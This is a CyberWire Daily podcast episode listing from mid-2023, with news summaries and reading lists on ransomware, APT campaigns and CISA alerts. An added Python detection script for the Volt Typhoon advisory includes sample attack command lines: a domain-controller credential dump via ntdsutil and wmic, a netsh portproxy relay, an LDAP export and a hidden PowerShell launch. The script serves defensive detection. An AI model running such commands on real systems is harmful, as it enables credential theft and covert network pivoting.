    CyberWire Daily – N2K Networks

    The daily cybersecurity news and analysis industry leaders depend on. Published each weekday, the program also includes interviews with a wide spectrum of experts from industry, academia, and research organizations all over the world.


    Copyright: © 2023 N2K Networks, Inc.


    Latest Episodes:
    Firmware comes in through the back door. Leveraging Adobe for credential harvesting. C2C market notes. Hybrid war updates. Jun 01, 2023

    A backdoor-like issue has been found in Gigabyte firmware. A credential harvesting campaign impersonates Adobe. The Dark Pink gang is active in southeastern Asia. Mitiga discovers a “significant forensic discrepancy” in Google Drive. "Spyboy" is for sale in the C2C market. A look at Cuba ransomware. Ukrainian hacktivists target the Skolkovo Foundation. The FSB says NSA breached iPhones in Russia. Carole Theriault examines Utah's social media bills aimed at kids online. Our guest is Tucker Callaway of Mezmo to discuss the rise of telemetry pipelines. And spoofing positions and evading sanctions.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/105


    Selected reading.

    Supply Chain Risk from Gigabyte App Center backdoor (Eclypsium)

    Ado-be-gone: Armorblox Stops Adobe Impersonation Attack (Armorblox)

    Dark Pink back with a bang: 5 new organizations in 3 countries added to victim list (Group-IB)

    Southeast Asian hacking crew racks up victims, rapidly expands criminal campaign (CyberScoop)

    Suspected State-Backed Hackers Hit Series of New Targets in Europe, SE Asia (Insurance Journal)

    Mitiga Security Advisory: Lack of Forensic Visibility with the Basic License in Google Drive (Mitiga)

    2023-05-31 // SITUATIONAL AWARENESS // Spyboy Defense Evasion Tool Advertised Online (Reddit)

    An In-Depth Look at Cuba Ransomware (Avertium)

    Russia’s ‘Silicon Valley’ hit by cyberattack; Ukrainian group claims deep access (The Record)

    Russia says U.S. accessed thousands of Apple phones in spy plot (Reuters)

    Fake Signals and American Insurance: How a Dark Fleet Moves Russian Oil (The New York Times)


    Two RAT infestations. Ghosts of sites past. Trends in identity security. Detecting deepfakes may prove more difficult than you think. May 31, 2023

    SeroXen is a new elusive evolution of the Quasar RAT that seems to live up to its hype, and DogeRAT is a cheap Trojan targeting Indian Android users. Salesforce ghost sites see abuse by malicious actors. A look into identity security trends. People may be overconfident in their ability to detect deepfakes. Deepen Desai from Zscaler describes a campaign targeting Facebook users. CW Walker from Spycloud outlines identity exposure in the Fortune 1000. And a blurring of the lines between criminal, hacktivist, and strategic motivations.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/104


    Selected reading.

    SeroXen RAT for sale (AT&T Cybersecurity)

    Sneaky DogeRAT Trojan Poses as Popular Apps, Targets Indian Android Users (The Hacker News)

    DogeRAT: The Android Malware Campaign Targeting Users Across Multiple Industries (CloudSek)

    Ghost Sites: Stealing Data From Deactivated Salesforce Communities (Varonis)

    2023 Trends in Securing Digital Identities (Identity Defined Security Alliance)

    Jumio 2023 Online Identity Consumer Study (Jumio)

    Void Rabisu’s Use of RomCom Backdoor Shows a Growing Shift in Threat Actors’ Goals (Trend Micro)

    Ukraine's DELTA Military System Users Under Attack from Info Stealing Malware (The Hacker News)


    Mirai’s new variant targets IoT devices. Volt Typhoon investigation continues. Hacktivism in Senegal. Lessons learned from Ukraine. May 30, 2023

    New Mirai malware uses low-complexity exploits to expand its botnet in IoT devices. The latest on Volt Typhoon. DDoS hits government sites in Senegal. The Pentagon's cyber strategy incorporates lessons from Russia's war, while the EU draws lessons from Ukraine's performance against Russia. Joe Carrigan explains Mandiant research on URL obfuscation. Mr. Security Answer Person John Pescatore plays security whack-a-mole. And NoName disrupts a British airport.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/103


    Selected reading.

    Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices (Unit 42)

    US officials believe Chinese hackers may still have access to key US computer networks (CNN)

    Chinese state-sponsored hackers infiltrated U.S. naval infrastructure, secretary of the Navy says (CNBC)

    US military intelligence also targeted by Chinese hackers behind critical infrastructure compromise (SC Magazine)

    Senegalese government websites hit with cyber attack (Reuters)

    DOD Transmits 2023 Cyber Strategy (US Department of Defense)

    Fact Sheet: 2023 DOD Cyber Strategy (US Department of Defense)

    Lessons from the war in Ukraine for the future of EU defence (European Union External Action)

    Investigation Launched After London City Airport Website Hacked (Simple Flying)

    Maryland high school listed on Zillow for $42K in ‘creative’ senior prank (New York Post)


    Stacy Dunn: My superpower and my kryptonite. [Engineer] [Career Notes] May 28, 2023

    Stacy Dunn, a Senior Solutions Engineer from the SANS Institute sits down and shares what it is like to work through her own adversity to get to be where she is today. Stacy shares some of her experiences as a woman with ADHD working in an IT career and explains her tips for other neurodiverse people in the field. After working in a wide array of positions in different fields, she wanted to go back to school to get her degree in management information systems and information assurance. Eventually she started working her way up the ladder, and became a very successful woman in the IT world. She shares her struggles with ADHD as she was making the climb and says "It's both a superpower and kryptonite because I think something that is a fundamental misunderstanding of most people, and maybe even some people that do have ADHD, is that it's not just the aspect of not being able to focus, it's also an aspect of focusing too much." We thank Stacy for sharing her story with us.


    8 GoAnywhere MFT breaches and counting. [Research Saturday] May 27, 2023

    This week, our guests are Emily Austin and Himaja Motheram from Censys, and they're sharing their research, "Months after first GoAnywhere MFT zero-day attacks, Censys still sees about 180 public admin panels." In early February 2023, a zero-day RCE vulnerability in Fortra's "GoAnywhere MFT" (Managed File Transfer) software came to light, and Censys researchers began tracking exposed instances.

    After that, the Clop ransomware gang claimed to have exploited this vulnerability to breach the data of 130 organizations, and Censys found other ransomware groups jumping on the bandwagon. As the researchers put it, "A single vulnerable instance has the potential to serve as a gateway to a data breach that could potentially impact millions of individuals."

    The research can be found here:

    • Months after first GoAnywhere MFT zero-day attacks, Censys still sees ~180 public admin panels

    CosmicEnergy: OT and ICS malware from Russia, maybe for red teaming. Updates on Volt Typhoon. Legion malware upgraded for the cloud. Natural-disaster-themed online fraud. May 26, 2023

    CosmicEnergy is OT and ICS malware from Russia, maybe for red teaming, maybe for attack. Updates on Volt Typhoon, China’s battlespace preparation in Guam and elsewhere. In the criminal underworld, Legion malware has been upgraded for the cloud. Johannes Ullrich from SANS examines time gaps in logging. Our guest is Kevin Kirkwood from LogRhythm with a look at extortion attempts and ransomware. And Atlantic hurricane season officially opens next week: time to batten down those digital hatches.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/102


    Selected reading.

    COSMICENERGY: New OT Malware Possibly Related To Russian Emergency Response Exercises (Mandiant)

    People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection (Joint Advisory)

    Volt Typhoon targets US critical infrastructure with living-off-the-land techniques (Microsoft)

    China hits back at 'the empire of hacking' over Five Eyes US cyber attack claims (ABC)

    Updates to Legion: A Cloud Credential Harvester and SMTP Hijacker (Cado)

    Legion Malware Upgraded to Target SSH Servers and AWS Credentials (Hacker News)

    CISA Warns of Hurricane/Typhoon-Related Scams (Cybersecurity and Infrastructure Security Agency CISA)


    Volt Typhoon goes undetected by living off the land. New gang, old ransomware. KillNet says no to slacker hackers. May 25, 2023

    China's Volt Typhoon snoops into US infrastructure, with special attention paid to Guam. Iranian cybercriminals are seen conducting ops against Israeli targets. A new ransomware gang uses recycled ransomware. A persistent Brazilian campaign targets Portuguese financial institutions. A new botnet targets the gaming industry. Phishing attempts impersonate OpenAI. Pro-Russian geolocation graffiti. Andrea Little Limbago from Interos addresses the policy implications of ChatGPT. Our guest is Jon Check from Raytheon Intelligence & Space, on cybersecurity and workforce strategy for the space community. And KillNet says no to slacker hackers.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/101


    Selected reading.

    People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection (Joint Advisory)

    Volt Typhoon targets US critical infrastructure with living-off-the-land techniques (Microsoft)

    Chinese hackers spying on US critical infrastructure, Western intelligence says (Reuters)

    Agrius Deploys Moneybird in Targeted Attacks Against Israeli Organizations (Check Point)

    Iran-linked hackers Agrius deploying new ransomware against Israeli orgs (The Record)

    Iranian Hackers Set Sights On Israeli Shipping & Logistics Firms (Information Security Buzz)

    Fata Morgana: Watering hole attack on shipping and logistics websites (ClearSky Security)

    Iran suspect in cyberattack targeting Israeli shipping, financial firms (Al-Monitor)

    Buhti: New Ransomware Operation Relies on Repurposed Payloads (Symantec)

    Operation Magalenha | Long-Running Campaign Pursues Portuguese Credentials and PII (SentinelOne)

    The Dark Frost Enigma: An Unexpectedly Prevalent Botnet Author Profile (Akamai)

    Fresh Phish: ChatGPT Impersonation Fuels a Clever Phishing Scam (INKY)


    CISA Alert AA23-144A – People's Republic of China state-sponsored cyber actor living off the land to evade detection. [CISA Cybersecurity Alerts] May 25, 2023

    Cybersecurity authorities are issuing this joint Cybersecurity Advisory to highlight a recent cluster of activity associated with a People’s Republic of China state-sponsored cyber actor, also known as Volt Typhoon.

    AA23-144A Alert, Technical Details, and Mitigations

    Active Directory and domain controller hardening: Best Practices for Securing Active Directory | Microsoft Learn

    CISA regional cyber threats: China Cyber Threat Overview and Advisories

    Microsoft Threat Intelligence blog: Volt Typhoon targets US critical infrastructure with living-off-the-land techniques | Microsoft Security Blog

    No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

    U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

    To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.
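    The advisory summarized above describes an actor that relies on built-in Windows tooling rather than dropped malware, which is why signature-based detection struggles with it. The script below is an added example, not part of the original page or of CISA's advisory: a small Python triage routine that flags process command lines matching the living-off-the-land patterns AA23-144A calls out (netsh portproxy forwarding, ntdsutil IFM dumps launched through wmic, ldifde directory exports, hidden PowerShell launches). The sample log lines are constructed for the example, and the regular expressions are this example's own heuristics, not CISA-published signatures; expect legitimate administrative use to trigger some of them, so treat hits as leads for review rather than verdicts.

```python
import re
from collections import Counter
from typing import Iterable

# Heuristic rules for the living-off-the-land command lines highlighted in
# AA23-144A. Patterns are this example's own; they favour readability over
# completeness and will match benign admin activity as well.
RULES = {
    # Adding a portproxy turns a compromised host into a relay into the network.
    "netsh_portproxy": re.compile(r"\bnetsh\b.*\bportproxy\b.*\badd\b", re.I),
    # "ifm" creates installation media from a DC, i.e. a copy of NTDS.dit.
    "ntdsutil_ifm_dump": re.compile(r"\bntdsutil\b.*\bifm\b", re.I),
    # wmic process call create is a common way to launch commands remotely.
    "wmic_remote_exec": re.compile(r"\bwmic\b.*\bprocess\b\s+call\s+create\b", re.I),
    # ldifde -f exports directory objects to a file for offline review.
    "ldifde_export": re.compile(r"\bldifde(\.exe)?\b.*\s-f\s", re.I),
    # Hidden-window PowerShell is rarely what an interactive admin types.
    "hidden_powershell": re.compile(r"\bpowershell\b.*-windowstyle\s+hidden", re.I),
}


def classify(cmdline: str) -> list[str]:
    """Return the names of every rule the command line matches, in RULES order."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def scan(lines: Iterable[str]) -> list[tuple[str, list[str]]]:
    """Run every rule over a stream of command lines; keep only the hits."""
    hits = []
    for line in lines:
        tags = classify(line)
        if tags:
            hits.append((line, tags))
    return hits


def summarize(hits: list[tuple[str, list[str]]]) -> Counter:
    """Count how often each rule fired, useful for prioritising review."""
    counts: Counter = Counter()
    for _, tags in hits:
        counts.update(tags)
    return counts


# Constructed sample: one CommandLine field per line, as a Sysmon Event ID 1
# or Security 4688 export might provide them. Addresses are RFC 1918 placeholders.
SAMPLE_CMDLINES = [
    'netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 '
    'connectaddress=10.1.2.3 connectport=8443 protocol=tcp',
    'wmic process call create "ntdsutil \\"ac i ntds\\" ifm \\"create full C:\\Windows\\Temp\\pro\\""',
    'ldifde.exe -f C:\\Windows\\Temp\\users.txt -d "DC=corp,DC=example"',
    'powershell start-process -filepath C:\\Windows\\Temp\\run.bat -windowstyle hidden',
    'netsh interface portproxy show all',          # read-only, should not fire
    'ping -n 1 10.1.2.3',                          # benign
]


if __name__ == "__main__":
    for line, tags in scan(SAMPLE_CMDLINES):
        print(f"{', '.join(tags):<40} {line}")
    print(summarize(scan(SAMPLE_CMDLINES)))
```

    Feeding real data means exporting the CommandLine field from Sysmon Event ID 1 or Security Event ID 4688 (with command-line auditing enabled); the advisory's own mitigations section stresses that without that logging these commands leave little trace.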


    Cybercriminals favor cyberespionage in North Korea, Russia, and parts unknown. Movements and activity in the cyber underworld. May 24, 2023

    Kimsuky's tailored reconnaissance tools. GoldenJackal is an APT quietly active since 2019. Criminals target Youtube viewers with free cracked software. Rheinmetall’s data was posted to BlackBasta's extortion site. The "Cuba" gang claims credit for the attack on the Philadelphia Inquirer. CERT-UA identifies a probable Russian cyberespionage campaign. Ireland views cyber assistance to Ukraine as a contribution to collective security. Ann Johnson from Afternoon Cyber Tea speaks with Tyrance Billingsley about Black Tech. Our guest is Oz Alashe from CybSafe on raising VC money amidst a down economy. And KillNet's underperforming hacktivists.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/100


    Selected reading.

    Kimsuky | Ongoing Campaign Using Tailored Reconnaissance Toolkit (SentinelOne)

    North Korean Kimsuky Hackers Strike Again with Advanced Reconnaissance Malware (The Hacker News)

    Meet the GoldenJackal APT group. Don’t expect any howls (Kaspersky)

    Follina — a Microsoft Office code execution vulnerability (DoublePulsar)

    YouTube Pirated Software Videos Deliver Triple Threat: Vidar Stealer, Laplas Clipper, XMRig Miner (FortiGuard Labs)

    Arms maker Rheinmetall confirms BlackBasta ransomware attack (Bleeping Computer)

    Inquirer and forensics team investigating computer disruptions to publishing (Philadelphia Inquirer)

    Cuba ransomware claims cyberattack on Philadelphia Inquirer (Bleeping Computer)

    Espionage activity UAC-0063 in relation to Ukraine, Kazakhstan, Kyrgyzstan, Mongolia, Israel, India (CERT-UA#6549) (CERT-UA)

    Ukraine Identifies Central Asian Cyberespionage Campaign (BankInfoSecurity)

    Ireland’s cyber security agency has been providing ‘non-lethal aid’ to Ukraine (Irish Times)


    BlackCat gang crosses your path and evades detection. You’re just too good to be true, can’t money launder for you. Commercial spyware cases. May 23, 2023

    AhRat exfiltrates files and records audio on Android devices. The BlackCat ransomware group uses a signed kernel driver to evade detection. GUI-Vil in the cloud. Unwitting money mules. Ben Yelin unpacks the Supreme Court’s section 230 rulings. Our guest is Mike DeNapoli from Cymulate with insights on cybersecurity effectiveness. And a trio of commercial spyware cases.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/99


    Selected reading.

    Android app breaking bad: From legitimate screen recording to file exfiltration within a year (ESET)

    Love scam or espionage? Transparent Tribe lures Indian and Pakistani officials (ESET)

    BlackCat Ransomware Deploys New Signed Kernel Driver (Trend Micro)

    Unmasking GUI-Vil: Financially Motivated Cloud Threat Actor (Permiso)

    Uncle Sam strangles criminals' cashflow by reining in money mules (The Register)

    German prosecutors charge four over violating trade act to sell spyware to Turkey (Washington Post)

    Israel Torpedoed Morocco Spyware Deal - and NSO Competitor QuaDream Shut Down (Haaretz)

    He Was Investigating Mexico’s Military. Then the Spying Began. (New York Times)


    Record GDPR fine. Movements in the cyber underworld. FBI found to have overstepped surveillance authorities. May 22, 2023

    The EU fines Meta for transatlantic data transfers. FIN7 returns, bearing Cl0p ransomware. Python Package Index temporarily suspends new registrations due to a spike in malicious activity. Typosquatting and TurkoRAT. UNC3944 uses SIM swapping to gain access to Azure admin accounts. A Turla retrospective. Rick Howard tackles workforce development. Our guest is Andrew Peterson of Fastly to discuss the intricate challenges of secure software development. And the FBI was found overstepping its surveillance authorities.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/98


    Selected reading.

    Meta Fined $1.3 Billion Over Data Transfers to U.S. (Wall Street Journal)

    Meta fined record $1.3 billion and ordered to stop sending European user data to US (AP News)

    Notorious Cyber Gang FIN7 Returns With Cl0p Ransomware in New Wave of Attacks (The Hacker News)

    Researchers tie FIN7 cybercrime family to Clop ransomware (The Record)

    Cybercrime gang FIN7 returned and was spotted delivering Clop ransomware (Security Affairs)

    PyPI new user and new project registrations temporarily suspended. (Python)

    PyPI repository restored after temporarily suspending new activity (Computing)

    RATs found hiding in the NPM attic (ReversingLabs)

    Legitimate looking npm packages found hosting TurkoRat infostealer (CSO Online)

    SIM Swapping and Abuse of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced Attack (Mandiant)

    Mozilla Explains: SIM swapping (Mozilla)

    The Underground History of Russia’s Most Ingenious Hacker Group (WIRED)

    Justice Department Announces Court-Authorized Disruption of Snake Malware Network Controlled by Russia’s Federal Security Service (US Department of Justice)

    Hunting Russian Intelligence “Snake” Malware (CISA)

    FBI misused intelligence database in 278,000 searches, court says (Reuters)

    FBI misused controversial surveillance tool to investigate Jan. 6 protesters (The Record)

    FBI broke rules in scouring foreign intelligence on Jan. 6 riot, racial justice protests, court says (AP News)


    Cybersecurity moneyball: First principles applied to the workforce gap. [CSO Perspectives] May 22, 2023

    Rick Howard, N2K's CSO and The CyberWire's Chief Analyst and Senior Fellow, discusses the cybersecurity workforce skills gap with N2K's President, Simone Petrella, looking at what security professionals might learn from the movie "Moneyball" about training their team in the aggregate on first principles.


    Dawn Cappelli: Becoming the cyber fairy godmother. [OT] [Career Notes] May 21, 2023

    Dawn Cappelli, OT CERT Director at Dragos, sits down to share what she has learned after her 25+ year career in the industry. She recalls wanting to have been a rockstar when she grew up, now she refers to herself as the fairy godmother of security. She shares some of the amazing things she got to work on throughout her career, including working with the Secret Service when the Olympics came to Salt Lake City, Utah in 2002. She shares how she was able to rise through the ranks to get to where she is now. Dawn talks about how she wasn't ready to retire quite yet because she loved the industry so much, saying "I retired, but I knew I still loved security. I have this passion for protection and so Dragos came along and they offered me this role of Director of OT CERT. I feel like I'm the security fairy godmother." She shares words of wisdom for all trying to get into the industry, saying that you need to always take the risk like she did when she first started her career. We thank Dawn for sharing her story with us.


    Dangerous vulnerabilities in H.264 decoders. [Research Saturday] May 20, 2023

    Willy R. Vasquez from The University of Texas at Austin discusses research on "The Most Dangerous Codec in the World - Finding and Exploiting Vulnerabilities in H.264 Decoders." Researchers are looking at the marvel that is modern video encoding standards such as H.264 for vulnerabilities and ultimately hidden security risks.

    The research states "We introduce and evaluate H26FORGE, domain-specific infrastructure for analyzing, generating, and manipulating syntactically correct but semantically spec-non-compliant video files." Using H26FORGE, they were able to uncover insecurities in depth across the video decoder ecosystem, including kernel memory corruption bugs in iOS and video accelerator and application processor kernel memory bugs in Android devices.

    The research can be found here:

    • The Most Dangerous Codec in the World: Finding and Exploiting Vulnerabilities in H.264 Decoders

    Section 230 survives court tests. Pre-infected devices. IRS cyber attachés. DraftKings hack indictment. Notes on the hybrid war. May 19, 2023

    Section 230 survives SCOTUS. Lemon Group's pre-infected devices. The IRS is sending cyber attachés to four countries in a new pilot program. A Wisconsin man is charged with stealing DraftKings credentials. Russian hacktivists conduct DDoS attacks against Polish news outlets. An update on RedStinger. Grayson Milbourne from OpenText Cybersecurity discusses IoT and the price we pay for convenience. Our guest is Matthew Keeley with info on an open source domain spoofing tool, Spoofy. And war principles and hacktivist auxiliaries.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/97


    Selected reading.

    “Honey, I’m Hacked”: Ethical Questions Raised by Ukrainian Cyber Deception of Russian Military Wives (Just Security)

    A Mysterious Group Has Ties to 15 Years of Ukraine-Russia Hacks (Wired)

    CloudWizard APT: the bad magic story goes on (SecureList)

    Ukraine at D+441: Skirmishing along the line of contact, and in cyberspace. (The CyberWire)

    Russian dissident gets three years in prison colony for DDoS attacks on military website (Cybernews)

    Europe: The DDoS battlefield (Help Net Security)

    Russian hackers hit Polish news sites in DDoS attack (Cybernews)

    18-year-old charged with hacking 60,000 DraftKings betting accounts (Bleeping Computer)

    Garrison Complaint (Department of Justice)

    IRS-CI deploys 4 cyber attachés to locations abroad to combat cybercrime (IRS)

    IRS deploys cyber attachés to fight cybercrime abroad (The Hill)

    Cybercrime gang pre-infects millions of Android devices with malware (Bleeping Computer)

    This Cybercrime Syndicate Pre-Infected Over 8.9 Million Android Phones Worldwide (The Hacker News)

    Lemon Group’s Cybercriminal Businesses Built on Preinfected Devices (Trend Micro)


    BEC attack exploits Dropbox services. Ransomware in the name of charity. API protection trends. Hybrid war hacktivism. Executive digital protection. May 18, 2023

    Business email compromise (BEC) exploits legitimate services. A hacktivist ransomware group demands charity donations for encrypted files. Trends and threats in API protection. The effects of hacktivism on Russia's war against Ukraine. Executive digital protection. Deepen Desai of Zscaler explains security risks in OneNote. Our guest is Ajay Bhatia of Veritas Technologies with advice for onboarding new employees. And news organizations as attractive targets.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/96


    Selected reading.

    Leveraging Dropbox to Soar Into Inbox (Avanan)

    MalasLocker ransomware targets Zimbra servers, demands charity donation (Bleeping Computer)

    Shadow API Usage Surges 900%, Revealing Alarming Lack of API Visibility Among Enterprises (Business Wire)

    APIs are Top Cybersecurity Priority for Most Organizations, Yet 40% Do Not Have an API Security Solution (PR Newswire)

    Evolving Cyber Operations and Capabilities (CSIS)

    Following the long-running Russian aggression against Ukraine. (The CyberWire)

    Executive Digital Protection whitepaper (Agency)

    The Philadelphia Inquirer’s operations continue to be disrupted by a cyber incident (The Philadelphia Inquirer)

    Cyberattack at the Philadelphia Inquirer. (The CyberWire)


    CISA Alert AA23-136A – #StopRansomware: BianLian Ransomware Group. [CISA Cybersecurity Alerts] May 18, 2023

    FBI, CISA, and the Australian Cyber Security Centre are releasing this joint Cybersecurity Advisory to disseminate known BianLian ransomware and data extortion group IOCs and TTPs identified through FBI and ACSC investigations as of March 2023.

    AA23-136A Alert, Technical Details, and Mitigations

    AA23-136A.STIX_.xml

    Stopransomware.gov, a whole-of-government approach with one central location for U.S. ransomware resources and alerts.

    cyber.gov.au for the Australian Government’s central location to report cyber incidents, including ransomware, and to see advice and alerts. The site also provides ransomware advisories for businesses and organizations to help mitigate cyber threats.

    CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide for guidance on mitigating and responding to a ransomware attack

    No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

    See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

    U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

    To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.


    A joint warning on BianLian ransomware. Fleeceware offers AI as bait for the gullible. Cyberespionage updates. And Ukraine formally joins NATO’s CCDCOE. May 17, 2023

    Cyber agencies warn of BianLian ransomware. There's a new gang using leaked Babuk-based ransomware. Chinese government-linked threat actors target TP-Link routers with custom malware. ChatGPT-themed fleeceware is showing up in online stores. Ukraine is now a member of NATO's Cyber Centre. Tim Starks from the Washington Post shares insights on section 702 renewal. Our guest is Ismael Valenzuela from BlackBerry sharing the findings from their Global Threat Intelligence Report. And the CIA's offer to Russian officials may have had some takers.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/95


    Selected reading.

    #StopRansomware: BianLian Ransomware Group (Cybersecurity and Infrastructure Security Agency CISA)

    Newly identified RA Group compromises companies in U.S. and South Korea with leaked Babuk source code (Cisco Talos Blog)

    The Dragon Who Sold His Camaro: Analyzing Custom Router Implant (Check Point Research)

    Fake ChatGPT Apps Scam Users Out of Thousands of Dollars, Sophos Reports (GlobeNewswire News Room)

    Ukraine joins NATO Cyber Centre (Computing)

    Russian Officials Unnerved by Ukraine Bloodshed Are Contacting CIA, Agency Says (Wall Street Journal)


    What is data centric security and why should anyone care? [CyberWire-X] May 17, 2023

    In today’s world, conventional cyber thinking remains largely focused on perimeter-centric security controls designed to govern how identities and endpoints utilize networks to access applications and data that organizations possess internally. Against this backdrop, a group of innovators and security thought leaders are exploring a new frontier and asking the question: shouldn’t there be a standard way to protect sensitive data regardless of where it resides or who it’s been shared with? It’s called “data-centric” security and it’s fundamentally different from “perimeter-centric” security models. Practicing it at scale requires a standard way to extend the value of “upstream” data governance (discovery, classification, tagging) into “downstream” collaborative workflows like email, file sharing, and SaaS apps.

    In this episode of CyberWire-X, the CyberWire’s Rick Howard and Dave Bittner explore modern approaches for applying and enforcing policy and access controls to sensitive data which inevitably leaves your possession but still deserves just as much security as the data that you possess internally. Rick and Dave are joined by guests Bill Newhouse, Cybersecurity Engineer at National Institute of Standards and Technology (NIST) National Cybersecurity Center of Excellence (NCCoE), and Dana Morris, Senior Vice President for Product and Engineering of our episode sponsor Virtru.


    DDoS trends. Asia sees a Lancefly infestation. Lessons from cyber actuaries. Infostealers in the C2C market. False flags. May 16, 2023

    DDoS "carpet bombing." Lancefly infests Asian targets. Cyber insurance trends. Infostealers in the C2C market. A Russian espionage service is masquerading as a criminal gang. KillNet’s running a psyop radio station of questionable quality. Joe Carrigan describes baiting fraudsters with fake crypto. Our guest is Gemma Moore of Cyberis talking about how red teaming can upskill detection and response teams. And geopolitical DDoS.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/94


    Selected reading.

    2023 DDoS Threat Intelligence Report (Corero)

    Lancefly: Group Uses Custom Backdoor to Target Orgs in Government, Aviation, Other Sectors (Symantec)

    2023 Cyber Claims Report (Coalition)

    The Growing Threat from Infostealers (Secureworks)

    Cybercriminals who targeted Ukraine are actually Russian government hackers, researchers say (TechCrunch)

    DDoS Attacks Targeting NATO Members Increasing (Netscout)

    Following the long-running Russian aggression against Ukraine. (The CyberWire)


    Ransomware, doxxing, and data breaches, oh my! State fronts and cyber offensives. May 15, 2023

    Discord sees a third-party data breach. Black Basta conducts a ransomware attack against technology company ABB. Intrusion Truth returns to dox APT41. Anonymous Sudan looks like a Russian front operation. Attribution and motivation of "RedStinger" remain murky. CISA summarizes Russian cyber offensives. Remote code execution exploits Ruckus in the wild. Our guest is Dave Russell from Veeam with insights on data protection. Matt O'Neill from the US Secret Service on their efforts to thwart email compromise and romance scams. And espionage by way of YouTube comments.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/93


    Selected reading.

    Discord discloses data breach after support agent got hacked (Bleeping Computer)

    Discord suffered a data after third-party support agent was hacked (Security Affairs)

    Multinational tech firm ABB hit by Black Basta ransomware attack (Bleeping Computer)

    Breaking: ABB confirms cyberattack; work underway to restore operations (ET CISO)

    Black Basta conducts ransomware attack against Swiss technology company ABB (The CyberWire)

    They dox Chinese hackers. Now, they’re back. (Washington Post)

    What’s Cracking at the Kerui Cracking Academy? (Intrusion Truth)

    Posing as Islamists, Russian Hackers Take Aim at Sweden (Bloomberg)

    Anonymous Sudan: Threat Intelligence Report (TrueSec)

    Uncovering RedStinger - Undetected APT cyber operations in Eastern Europe since 2020 (Malwarebytes)

    Russian ‘Red Stealer’ cyberattacks target breakaway territories in Ukraine (Cybernews)

    Russia Cyber Threat Overview and Advisories (CISA)

    Known Exploited Vulnerabilities Catalog (CISA)

    CISA Adds Seven Known Exploited Vulnerabilities to Catalog (CISA)

    CISA warns of critical Ruckus bug used to infect Wi-Fi access points (Bleeping Computer)

    Security Bulletins (Ruckus)

    ROK union leaders charged with spying for North Korea in ‘movie-like’ scheme (NK News)


    Steve Benton: Mixing like a DJ. [VP] [Career Notes] May 14, 2023

    Steve Benton, Vice President at Anomali Threat Research & GM Belfast, sits down to share his story as a cybersecurity expert with a surplus of strategic leadership experience across cyber and physical security, rooted in substantial operational directorship and accountability. Steve shares his beginnings, when he wanted to grow up to be a rockstar, slowly moving into the world of tech with his first ever computer and falling in love with it. After graduating from Queens University with a degree in information technology, he joined British Telecommunications, or BT, where he got to put his newfound skills to use. Steve mentions how his job is kind of like being a DJ and says "a typical day for me is looking at the intelligence that we're bringing in, mixing it as it were to think of a slight, like DJs with a set of headphones on creating the right kind of mixes of intelligence for our clients." We thank Steve for sharing his story with us.


    Running away from operation Tainted Love. [Research Saturday] May 13, 2023

    Aleksandar Milenkoski and Juan Andres Guerrero-Saade from SentinelOne's SentinelLabs join Dave to discuss their research "Operation Tainted Love | Chinese APTs Target Telcos in New Attacks." Researchers found initial phases of attacks against telecommunication providers in the Middle East in Q1 of 2023.

    The research states "We assess that this activity represents an evolution of tooling associated with Operation Soft Cell." While the exact grouping is unclear, researchers think it is highly likely that the threat actor is a Chinese cyberespionage group in the nexus of Gallium and APT41.

    The research can be found here:

    • Operation Tainted Love | Chinese APTs Target Telcos in New Attacks

    CISA Alert AA23-131A – Malicious Actors Exploit CVE-2023-27350 in PaperCut MF and NG. May 12, 2023

    FBI and CISA are releasing this joint Cybersecurity Advisory in response to the active exploitation of CVE-2023-27350. This vulnerability occurs in certain versions of PaperCut NG and PaperCut MF, software applications that help organizations manage printing services, and enables an unauthenticated actor to execute malicious code remotely without credentials.

    AA23-131A Alert, Technical Details, and Mitigations

    PaperCut: URGENT | PaperCut MF/NG vulnerability bulletin (March 2023)

    Huntress: Critical Vulnerabilities in PaperCut Print Management Software

